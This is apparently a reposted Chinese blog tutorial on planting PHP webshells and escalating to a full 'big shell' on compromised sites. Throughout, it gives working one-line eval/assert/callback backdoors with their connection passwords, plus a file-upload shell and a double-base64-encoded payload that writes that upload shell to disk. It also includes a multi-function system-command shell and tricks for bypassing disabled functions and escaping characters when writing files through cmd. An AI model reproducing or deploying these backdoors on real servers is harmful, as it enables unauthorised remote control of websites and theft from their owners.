您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關代碼執行函數和命令執行函數及Getshell方法的示例分析,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
僅供參考學習使用
代碼執行函數 VS 命令執行函數
一直想整理這兩塊的內容,但是一直沒時間弄,直到前兩天碰上一個寫入了菜刀馬但是死活連不上菜刀的站,頓時不知道怎么繼續了,所以就趁這個機會整理了一下代碼執行函數怎么getshell和命令執行函數怎么getshell的思路,各位大牛有什么想法可以一起交流一下。那么我們開始正題。
菜刀馬的原理其實是調用了代碼執行函數。而菜刀之所以能夠執行系統命令和上傳文件,也是調用了命令執行函數。命令馬的原理是調用了命令執行函數。
這兩種都能夠getshell(以上傳大馬為準)因為有一些服務器做了限制,比如菜刀連不上,或者禁用了某些函數,或者利用SQL注入寫文件和XML之類的漏洞,所以有時候在有了菜刀馬和命令馬之后要上傳大馬還是有一些波折的,當然能夠直接上傳或寫入大馬的除外。
一、首先是菜刀馬:
菜刀馬的原理是調用了PHP的代碼執行函數,比如以下1和2兩個常見的一句話菜刀馬,就是調用了eval函數、assert函數。
1、eval()函數
那么當我們上傳了eval函數的菜刀馬之后,在連接不上菜刀的情況下怎么上傳大馬呢?繼續往下看
這里我是先寫一個上傳馬,再用上傳馬去上傳大馬,有點多次一舉,但是考慮到大馬代碼量太多,還是建議先寫個上傳馬,以下代碼只有1kb。
<?php
@$temp = $_FILES['upload_file']['tmp_name'];
@$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '' method = 'POST' ENCTYPE='multipart/form-data'>\n";echo "Local file: <input type = 'file' name = 'upload_file'>\n";echo "<input type = 'submit' value = 'Upload'>\n";echo "</form>\n<pre>\n\n</pre>";}else {if(move_uploaded_file($temp,$file)){echo "File uploaded successfully.<p>\n";}else {echo "Unable to upload " . $file . ".<p>\n";}}?>
原理是利用文件操作函數如下:
fputs(fopen(shell.php,w),xxxx);
寫入xxxx到腳本執行文件當前目錄下的shell.php文件。
由于是利用post傳參,不能出現【<】【>】【+】【=】【/】等符號,所以這里我們需要把代碼編碼一下,將上面的上傳代碼進行兩次base64編碼(為了去除=號)。
☆☆☆鏈接文字在編碼的時候空格和回車都會影響編碼后的結果,因此建議大家直接復制我上面的上傳馬或者用下面我編碼好的,或者自己去慢慢嘗試直到base64編碼后為一串自由數字和字母的字符串即可。
接下來利用文件操作函數寫入上傳馬,注意不要忘了最后的分號。
cmd=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h3WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h7WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h3WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh3SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
成功得到上傳馬,之后就是上傳我們的大馬了。
2、assert()函數
#assert函數是直接將傳入的參數當成PHP代碼直接,不需要以分號結尾,當然你加上也可以。
#命令執行:cmd=system(whoami)
#菜刀連接密碼:cmd
<?php @assert($_POST['cmd'])?>
上傳大馬,這一步參考eval函數。
其他的代碼執行函數還有以下幾個,均給出了菜刀馬和連接方式:
3、preg_replace()
#preg_replace('正則規則','替換字符','目標字符')
#執行命令和上傳文件參考assert函數(不需要加分號)。
#將目標字符中符合正則規則的字符替換為替換字符,此時如果正則規則中使用/e修飾符,則存在代碼執行漏洞。
preg_replace("/test/e",$_POST["cmd"],"jutst test");
這里可以使用chr()函數轉換ASCII編碼來執行代碼。
#phpinfo();
eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))
4、create_function()函數
#創建匿名函數執行代碼
#執行命令和上傳文件參考eval函數(必須加分號)。
#菜刀連接密碼:cmd
$func =create_function('',$_POST['cmd']);$func();
5、array_map()函數
#array_map() 函數將用戶自定義函數作用到數組中的每個值上,并返回用戶自定義函數作用后的帶有新值的數組。 回調函數接受的參數數目應該和傳遞給 array_map() 函數的數組數目一致。
#命令執行http://localhost/123.php?func=system cmd=whoami
#菜刀連接http://localhost/123.php?func=assert 密碼:cmd
$func=$_GET['func'];
$cmd=$_POST['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
echo $new_array;
6、call_user_func()函數
#傳入的參數作為assert函數的參數
#cmd=system(whoami)
#菜刀連接密碼:cmd
call_user_func("assert",$_POST['cmd']);
7、call_user_func_array()函數
#將傳入的參數作為數組的第一個值傳遞給assert函數
#cmd=system(whoami)
#菜刀連接密碼:cmd
$cmd=$_POST['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
8、array_filter()函數
#用回調函數過濾數組中的元素:array_filter(數組,函數)
#命令執行func=system&cmd=whoami
#菜刀連接http://localhost/123.php?func=assert 密碼cmd
$cmd=$_POST['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);
9、uasort()函數
#php環境>=<5.6才能用
#uasort() 使用用戶自定義的比較函數對數組中的值進行排序并保持索引關聯 。
#命令執行:http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);
#菜刀連接:http://localhost/123.php?1=1+1&2=eval($_POST[cmd]) 密碼:cmd
usort($_GET,'asse'.'rt');
二、命令執行函數
PHP執行系統命令的有幾個常用的函數,如有:system函數、exec函數、popen函數,passthru,shell_exec函數他們都可以執行系統命令,下面是我整理的一個命令馬,把常見的命令執行函數都做了一個梳理,如果大家還有什么新的思路或見解,可以一起交流交流。
<?php
$command=$_POST['cmd'];
#function exec_all($command)
#{
//system函數可執行并直接顯示結果
if(function_exists('system'))
{
echo "<pre>";
system($command);
echo "</pre>";
}
//passthru函數可執行并直接顯示結果
else if(function_exists('passthru'))
{
echo "<pre>";
passthru($command);
echo "</pre>";
}
//shell_exec函數可執行但需要加echo才能顯示結果
else if(function_exists('shell_exec'))
{
echo "<pre>";
echo shell_exec($command);
echo "</pre>";
}
//function exec(命令,以數組形式的保存結果,命令執行的狀態碼)
//可執行,但需要加echo才能顯示結果
else if(function_exists('exec'))
{
echo "<pre>";
exec($command,$output);
echo "</br>";
print_r($output);
echo "</pre>";
}
//popen函數:打開一個指向進程的管道,該進程由派生指定的 command 命令執行而產生。
//返回一個和 fopen() 所返回的相同的文件指針,只不過它是單向的(只能用于讀或寫)
//此指針可以用于 fgets(),fgetss() 和 fwrite()。并且必須用 pclose() 來關閉。
//若出錯,則返回 false。
else if(function_exists('popen'))
{
$handle = popen($command , "r"); // Open the command pipe for reading
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
echo "<pre>";
while(!feof($handle))
{
echo fread($handle, 1024);
}
echo "</pre>";
}
else if(function_exists('fgets') && function_exists('feof'))
{
echo "<pre>";
while(!feof($handle))
{
echo fgets($handle,1024);
}
echo "<pre>";
}
}
pclose($handle);
}
//proc_open — 執行一個命令,并且打開用來輸入/輸出的文件指針。
else if(function_exists('proc_open'))
{
$descriptorspec = array(
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
);
$handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
echo "<pre>";
while(!feof($pipes[1]))
{
echo fread($pipes[1], 1024);
}
echo "</pre>";
}
else if(function_exists('fgets') && function_exists('feof'))
{
echo "<pre>";
while(!feof($pipes[1]))
{
echo fgets($pipes[1],1024);
}
echo "<pre>";
}
}
#pclose($handle);
}
else
{
echo 'GG';
}
#}
其他函數:
暫時就知道其他兩個函數,不過也都是基于以上的函數所變化的。
<?php
$cmd=$_POST['cmd'];
echo "<pre>";
//可執行并直接顯示結果,反引號,波浪鍵。
//shell_exec() 函數實際上僅是反撇號 (`) 操作符的變體
//所以如果把shell_exec()函數禁用了,反撇號 (`)也是執行不了命令的。
echo `$cmd`;
//注意,這個只顯示結果的第一行,因此基本只能執行whoami
//ob_start:打開緩沖區,需要system函數開啟
$a = 'system';
ob_start($a);
echo "$_POST[cmd]";
ob_end_flush();
echo "</pre>";
上面講完命令執行命令,也都可以執行命令了,那么如何利用這些命令馬來進一步上傳我們的大馬呢。
這里了我是用echo寫文件的思路,遺忘大佬教的用msf結合命令行去下載大馬我暫時還沒去實踐,就留著以后有時間再寫了,廢話不多說,開干吧!
成功執行命令之后,首先利用【dir】命令得到網站路徑,如果是mysql注入得到的os-shell也可用【dir d:\ /b】命令查找存放網站程序的路徑。
然后用【echo】命令寫入我們的上傳馬
☆☆☆這里注意【<】【>】【&】這三個字符在CMD命令行中有特殊意義,需要在前面加【^】進行轉義,可以用文本的替換來實現這個功能。
寫入成功之后就可以上傳我們的大馬啦 ^-^!然后就看大家的啦,該修復修復,想提交提交,到這里就結束啦,有什么意見歡迎一起交流交流。
關于“代碼執行函數和命令執行函數及Getshell方法的示例分析”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。